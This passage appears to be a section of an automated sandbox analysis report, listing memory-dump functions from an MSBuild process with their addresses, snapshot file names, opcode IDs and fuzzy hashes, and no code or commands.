                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a58d0bc0aa87a61e369baa5a660f17c43113cae646de3eba7b07d69f8784fdb
                          • Instruction ID: 2811c1468aeb498cf331265cd6f05f3a41374eaa3260d51f9111dac68dbe449f
                          • Opcode Fuzzy Hash: 3a58d0bc0aa87a61e369baa5a660f17c43113cae646de3eba7b07d69f8784fdb
                          • Instruction Fuzzy Hash: CBE0ED39E00115CFCF24CE45D540BB9B7B7BB80614F199CD5DB0C67280E734A9408B81
                          Function 05AC40B0 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2243d9fc5186507e9d4b23187597ba178a35cc41f9d151be605f75664ac68b29
                          • Instruction ID: 84397240d3dcdcf36d8426c9271e185109f4229be0164cbdadbcdddea1dfb0be
                          • Opcode Fuzzy Hash: 2243d9fc5186507e9d4b23187597ba178a35cc41f9d151be605f75664ac68b29
                          • Instruction Fuzzy Hash: 9EE0C27290524CAFCF02FBF08A1589E7FB99F1620074109EAD404EB211FE368A1047D1
                          Function 058F156E Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c2c3a210988d6808776f80f87853030e7d9ed2cafb5769ed3fb4b6cda0d6b68
                          • Instruction ID: b73b2ad3f864a5c298205e280d0444d7cfddc38d73b85d0fe34521a4a4628f14
                          • Opcode Fuzzy Hash: 0c2c3a210988d6808776f80f87853030e7d9ed2cafb5769ed3fb4b6cda0d6b68
                          • Instruction Fuzzy Hash: B9F03938A14255CBDB24DB65D44877ABBA2FB48310F5045A5DE07E3344DB349D018B92
                          Function 058F2EE6 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52f512da05a7c680e2e8b13d4f546cf174d17d332fad070ede481bfac3b55ff1
                          • Instruction ID: 30430504e2364799ca879560971fab5fb1aad9f3d0a311a07d6545921d766ac3
                          • Opcode Fuzzy Hash: 52f512da05a7c680e2e8b13d4f546cf174d17d332fad070ede481bfac3b55ff1
                          • Instruction Fuzzy Hash: 55E0123A704615C79B25AA31AD8C63E355BB7CC295B068424DE03D3248FF74CD439752
                          Function 05AC2E78 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 260466ebbbcf7d936da32d37fae61b51fd280ed32d199486c72bddd905974b13
                          • Instruction ID: bf2a439d6e71ed06a728dfff5aaecb3d4e5e6fcd95cef33fe95f1f9909d898b4
                          • Opcode Fuzzy Hash: 260466ebbbcf7d936da32d37fae61b51fd280ed32d199486c72bddd905974b13
                          • Instruction Fuzzy Hash: 12D05E3631C3641BDB2112556851B6A3F6DDB43671B0504AFF949EA182D986A84442A6
                          Function 058F6980 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3747186787cb16560e95ab56e236f39e57684448465639ff6f19295dfee2cb0
                          • Instruction ID: d8733b800410b557da94973bbe63b38fc8e69274aacdd4d665a4558b1e6c5713
                          • Opcode Fuzzy Hash: b3747186787cb16560e95ab56e236f39e57684448465639ff6f19295dfee2cb0
                          • Instruction Fuzzy Hash: 62D05E323882051FD304C588DC43BA9B3A6DBC4224F18D0786408C7B82CA2EEC038180
                          Function 058FA8D8 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 910ab64a519c685e49294f5b5a2f9069d262335491e08631640cd135739f776e
                          • Instruction ID: 24da6dd0bbf52d96ef54ee7ba0a7e26236547ac19a470f7625f3286444d9db49
                          • Opcode Fuzzy Hash: 910ab64a519c685e49294f5b5a2f9069d262335491e08631640cd135739f776e
                          • Instruction Fuzzy Hash: 0CD05E32A1530DEBCB10DEB4ED054AAB3ACEB09115B1406F9AD0EC3214FA32DE50DB90
                          Function 05AA2E58 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2f07745d00f64fefdce1fda1bc1c729dc647a41abcc3c667db6f5a2052b41b6
                          • Instruction ID: b7004e70c784533b22d24a662f15e914c8a5f7cfc8912c1c8e3bb4cd30917aef
                          • Opcode Fuzzy Hash: d2f07745d00f64fefdce1fda1bc1c729dc647a41abcc3c667db6f5a2052b41b6
                          • Instruction Fuzzy Hash: FFD02B373403049BDA34A7F08D04F6277EABF41610F50006ADB259F681E763EC918350
                          Function 058F8FE0 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7216717f6204bd6aacddfbada82bba2ec852c2a05aee5bf57bd0d5a7af4277c
                          • Instruction ID: db4c024f50c3404a5ec678b72320a1a8fa9784472805ae4b23b1de19d05f4067
                          • Opcode Fuzzy Hash: f7216717f6204bd6aacddfbada82bba2ec852c2a05aee5bf57bd0d5a7af4277c
                          • Instruction Fuzzy Hash: E8E0CD71809148BFCB01EBF0994195E7FF9DF05200B414DFDC40457111ED75471457C1
                          Function 058F2F13 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62b31213359d922840c97aa0f1094332d14cc5fc2873412f484edcbcd28fc601
                          • Instruction ID: ed51ace1cf9730ea499184b2756901a55824bd2f365c2820859f697e9214a5e3
                          • Opcode Fuzzy Hash: 62b31213359d922840c97aa0f1094332d14cc5fc2873412f484edcbcd28fc601
                          • Instruction Fuzzy Hash: 93E0172970461AC3EB24AA319D8873E255BB7CD355F0A88299E03C3248FF38CC829712
                          Function 05AA5670 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f71dd77d1b6035dea9f9f6696252dbbf51c7680c5d22863d2335f0c09bdde586
                          • Instruction ID: 7881d8d51c1ae4b5e74db435256dc8041e2afda7cecedfbf834b8f2694eea56e
                          • Opcode Fuzzy Hash: f71dd77d1b6035dea9f9f6696252dbbf51c7680c5d22863d2335f0c09bdde586
                          • Instruction Fuzzy Hash: 2EE0C27398B3245BCB230A615801B857B306B12B90F0B04E7DF88AF3D1E2316C58C3C9
                          Function 05AC6ED5 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43b21dc6890d3a602a12039dd1307fcd810649b59f5bb6ed7c0a824188dcd9e2
                          • Instruction ID: a4c395fa83414317c99d0b6e1fc8455b7566f94dac01cd530e08d3d44052c05a
                          • Opcode Fuzzy Hash: 43b21dc6890d3a602a12039dd1307fcd810649b59f5bb6ed7c0a824188dcd9e2
                          • Instruction Fuzzy Hash: 95E07538A01104DFCB44DB98E594A6CBBB2FB89310F24C55AE91697365CB35EC42CF00
                          Function 058F14FA Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fed4fc377231a642de889e282443fa997c6ef54e3246e7d288f893cd45a4aa4
                          • Instruction ID: 6ff27f9176015876c294ae3d4b1ca79b6f8956f668adf0acb3072cb19bc335e5
                          • Opcode Fuzzy Hash: 1fed4fc377231a642de889e282443fa997c6ef54e3246e7d288f893cd45a4aa4
                          • Instruction Fuzzy Hash: E5E09A38A04254CBDB24DF60D48877ABBA2FB48300F4044A5DD06E3384DB308D008F92
                          Function 058F8F0A Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b52b6982a8431cac7e399c446d90985a36cbe90f2932c3dbd7e1de9688aa0d9
                          • Instruction ID: d13e5d329e0e8fe6bd7109bd0ef942b4e3853600f22e51b4c4983f60b777a836
                          • Opcode Fuzzy Hash: 1b52b6982a8431cac7e399c446d90985a36cbe90f2932c3dbd7e1de9688aa0d9
                          • Instruction Fuzzy Hash: 97D05E323A822447C34D6148E8427AE374AE794531F054129E905C7F86DA68880302D5
                          Function 058FEEA0 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f56e87986953cbf16eb8173ac9bd5705fca8812cfb0a6984953e654045681d1a
                          • Instruction ID: 740cf512152885b6961f585acfd663d9abd7ea738f9a339f3be039e15076234b
                          • Opcode Fuzzy Hash: f56e87986953cbf16eb8173ac9bd5705fca8812cfb0a6984953e654045681d1a
                          • Instruction Fuzzy Hash: 8AE01270A40209EFDB44DFB5E941B7E77BAEB55200F5045A8D904DB284EA726E049780
                          Function 058F6E10 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c89ddb0f90dd8ce3c82789833b80f06d7da58408dddbe910cf3c0f940399190a
                          • Instruction ID: 7bc86959389a3b723bb201126a6c41b45e5d2c925538bcf876dc253e61696a30
                          • Opcode Fuzzy Hash: c89ddb0f90dd8ce3c82789833b80f06d7da58408dddbe910cf3c0f940399190a
                          • Instruction Fuzzy Hash: 19D05E723843061BD354D548CC82B9DB79ACBE8320F08C478A408C7B82CA2EE8438184
                          Function 05AC7500 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 007925e784491a745aa7875161bcca592fedbffd591197c9660393543bae8106
                          • Instruction ID: 3d283dbb08fdb50b3e89505c81c008a71bf6fa11098a6612e236f336ec227245
                          • Opcode Fuzzy Hash: 007925e784491a745aa7875161bcca592fedbffd591197c9660393543bae8106
                          • Instruction Fuzzy Hash: 4ED0A77120C3441FD341C668CC15C11BBB99B96910315C09AFC48C7392FA22FD02C371
                          Function 058FEE58 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4397b8b7a34cc0fe1494239c5b29e4ee03749831f10a1234956ffc14a71d563c
                          • Instruction ID: f7a950ac308b68e6391d3aceb5d13577e5bb72f234fc5f8674622e1f5dd295eb
                          • Opcode Fuzzy Hash: 4397b8b7a34cc0fe1494239c5b29e4ee03749831f10a1234956ffc14a71d563c
                          • Instruction Fuzzy Hash: 28E01230A10108EFCB44EFA9E64169D77F9EB55204F1041A89808E7304EA716E04D791
                          Function 058F6678 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61cb6eb0c2bb6e897218618b6b5390077a8f722db0d7936c049c9ac793e91f32
                          • Instruction ID: bb559cd9e63285f842ffa59cec69cfb130f4eb354ed15726ef19bdad66fad4c8
                          • Opcode Fuzzy Hash: 61cb6eb0c2bb6e897218618b6b5390077a8f722db0d7936c049c9ac793e91f32
                          • Instruction Fuzzy Hash: 63D05E322041686F8300CA89C810CB6BBEC9A8D120708C05BB958C7241C976ED0287A0
                          Function 058F1021 Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b1a7f9c0573e3ecc749d8bc9e8068c736828ce86b1f810245163ee9e608bdab
                          • Instruction ID: abf55e28c19d6722bdf67dc15cb109852e8c81bc1500106385fa871d927f9b56
                          • Opcode Fuzzy Hash: 8b1a7f9c0573e3ecc749d8bc9e8068c736828ce86b1f810245163ee9e608bdab
                          • Instruction Fuzzy Hash: 42D0A7B63042844FD350CE6CDD12E51B7B19BFC500B45D49A954DCB381E633DD07C661
                          Function 0590479F Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
                          • Instruction ID: 3ef37b5ce2d0ecd3254175088fdd49665087134a0662d7559c9e4244a2effeb9
                          • Opcode Fuzzy Hash: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
                          • Instruction Fuzzy Hash: 11E0EC35E00215CFCF20CE45D100BB9B7B6BB80625F069CD5DB0C67280D3349A508BC2
                          Function 02AE5868 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be6f5c4c29d83b576d64eb46ae71c89b365f991ca48fce1e88cede256c011d24
                          • Instruction ID: c4dc5cede5f6bad7f1515d0bc139f517f0a2a15f7df6086d3a87db233eb94415
                          • Opcode Fuzzy Hash: be6f5c4c29d83b576d64eb46ae71c89b365f991ca48fce1e88cede256c011d24
                          • Instruction Fuzzy Hash: 83D0973324023AC2DB000ECDF8406B07768C780B29F04027AFB38852C0DB74410A8B00
                          Function 05AC9590 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d5d0f8f51ef32dc2f7b5fb1c5a3468f864ccecdd4284069fb8b088386cc4331
                          • Instruction ID: 1aeb5dd017643200905c27f0f58fef7799887c29f13d763ae98264b7111aac8f
                          • Opcode Fuzzy Hash: 2d5d0f8f51ef32dc2f7b5fb1c5a3468f864ccecdd4284069fb8b088386cc4331
                          • Instruction Fuzzy Hash: 2BD0677105C298CFA309ABB0641EC3F7F71AA5274134510CAF41B96477DF52A91B8BA6
                          Function 05AC49E8 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cdc1a10a76ff2ba8535e65c3330dbec0180be78451f90ef1ab0a0ae80782c8a3
                          • Instruction ID: 7c01196096310fd62b70e3826a8a3291adedd4291152a1710fcb1ca1dac8e347
                          • Opcode Fuzzy Hash: cdc1a10a76ff2ba8535e65c3330dbec0180be78451f90ef1ab0a0ae80782c8a3
                          • Instruction Fuzzy Hash: ABE0177244530EAFDF034EA0D800AEA3F76AF66390F41402AF91548060D733C871EF50
                          Function 058F39F0 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 363ad89d108b754bcb631c4387b65a1556c847044f8d9d9a586f0e59dc31f5cf
                          • Instruction ID: 1b214d8761a728b5d2cd02654f030b859e4c0c7c93b602168b70277c80db54d0
                          • Opcode Fuzzy Hash: 363ad89d108b754bcb631c4387b65a1556c847044f8d9d9a586f0e59dc31f5cf
                          • Instruction Fuzzy Hash: DCD0A7713041041FD304D54CCC41B15BBA6DB85214F0CC0BDA408C7343DA3AFC138780
                          Function 05AA9F98 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb9297c90b360d1ec639f9ac204913fdd0e198a69d714ae3c68ee5fef6a4c6cd
                          • Instruction ID: 93266b482d1ecd02eca4d678c1950ff6b9f8c2f2ac1c8bed167fe145063c6400
                          • Opcode Fuzzy Hash: eb9297c90b360d1ec639f9ac204913fdd0e198a69d714ae3c68ee5fef6a4c6cd
                          • Instruction Fuzzy Hash: 01D0EC311046029FCB19DB18E540D8BBB9AAF80300B04CA39A05647538DB74ED4AC784
                          Function 05AA5680 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65db56d5a1857ea907346be2c7fabc422f99e802ca359c79d4e315bf729ece05
                          • Instruction ID: 6330e31dcc723f6ea3586785c9fa61c268e947db8170073a2eee0de596d1118b
                          • Opcode Fuzzy Hash: 65db56d5a1857ea907346be2c7fabc422f99e802ca359c79d4e315bf729ece05
                          • Instruction Fuzzy Hash: 5FD0C73394532467DA3155555C01F96775C9B55BA0F150065EF086F2849172785086D8
                          Function 02AE4D88 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6d9beabb6b960e6c03f2275700e6efe637065edbe95532f42d39cf014eb72d0
                          • Instruction ID: b3ded9fd443f13067114c1a7e93198d4eeab4b745bbbc5790deeb3294c3b18b0
                          • Opcode Fuzzy Hash: d6d9beabb6b960e6c03f2275700e6efe637065edbe95532f42d39cf014eb72d0
                          • Instruction Fuzzy Hash: 40D0923A280020CFDA509B8AE8C4B85B7A9FB98365B648052E209CB532C736D81A8B10
                          Function 05AC40C0 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 818fbbd60c945ed0d99112216551bce042fa60c85722390a6570228c58c0e813
                          • Instruction ID: 0899533724105230a8c8f1c6c18bf5724372321b017f05b5cdf1ae473f96e21c
                          • Opcode Fuzzy Hash: 818fbbd60c945ed0d99112216551bce042fa60c85722390a6570228c58c0e813
                          • Instruction Fuzzy Hash: 03D0C77295510CEB8B01EFF4DA0145E7BFDDF5520075049E5D50597210EE759B1057D1
                          Function 05AC6A70 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5118d9bcae30a18404af6608a3dc7c34877b0a7b6c7a1cb788a10fe605b2c25
                          • Instruction ID: 1c58718764d04a3461237895dde75a277c62c7abdde58007285d1b56eba631f9
                          • Opcode Fuzzy Hash: b5118d9bcae30a18404af6608a3dc7c34877b0a7b6c7a1cb788a10fe605b2c25
                          • Instruction Fuzzy Hash: 5DD0A9712003045FE300CB8CDC42B22B7B8EB98A24F00C16CA858CB391EB32EC03CA60
                          Function 058F2DA1 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa566b557b8920d9ea8fe13de2da28fe2b80b1847046967d96d5969b359f7fba
                          • Instruction ID: 0af93c36f4a1924855e42be680a69d5620cf3cad3dcaaa2ccb9f0bed37bbc93c
                          • Opcode Fuzzy Hash: aa566b557b8920d9ea8fe13de2da28fe2b80b1847046967d96d5969b359f7fba
                          • Instruction Fuzzy Hash: 91C002312881255FE249D598DD43B58BB79D794628F9881BDB408DB392DB2BE8134584
                          Function 058FC4CB Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1263342ddc8fc088c07e816f203dd84e8c4ea0b83d286e60aa808a74227083bf
                          • Instruction ID: f051710e0c0335ef9ee4c536da891cf566c031bb1e37a1a3da2ffc368760d9e2
                          • Opcode Fuzzy Hash: 1263342ddc8fc088c07e816f203dd84e8c4ea0b83d286e60aa808a74227083bf
                          • Instruction Fuzzy Hash: C5D05B7074C11DCFDB3CDF25E054636225BBBD8304F2580258E02CB18CEE358D418785
                          Function 058F8FF0 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3b34e036739ad80b8eae71fa985a5b6f48181e9400e0000bd70ecb3f4e453b8
                          • Instruction ID: 8fb42414b3a74cc3503d10e862efbe0636182d2141ab55bf50512b6cea971ce6
                          • Opcode Fuzzy Hash: b3b34e036739ad80b8eae71fa985a5b6f48181e9400e0000bd70ecb3f4e453b8
                          • Instruction Fuzzy Hash: EED0C77295510CEB8B01EFF4DA0085E7BFDDF552007504DE9D50497110EE759B1057D1
                          Function 058F1080 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c1a0ed66a11b8562fb1ea0ad91d10a8a4df215a7317af9ad335074d6cf2de0d
                          • Instruction ID: f2cb57e991ad817d4feb9652b20b07369a0c5905a4d85aeeb2999d273f6f1dde
                          • Opcode Fuzzy Hash: 0c1a0ed66a11b8562fb1ea0ad91d10a8a4df215a7317af9ad335074d6cf2de0d
                          • Instruction Fuzzy Hash: 2AD0A772B042041FC300C658CC55E52B794CB94A00B01C46DE508C7391ED22FD03CA54
                          Function 058F5B51 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
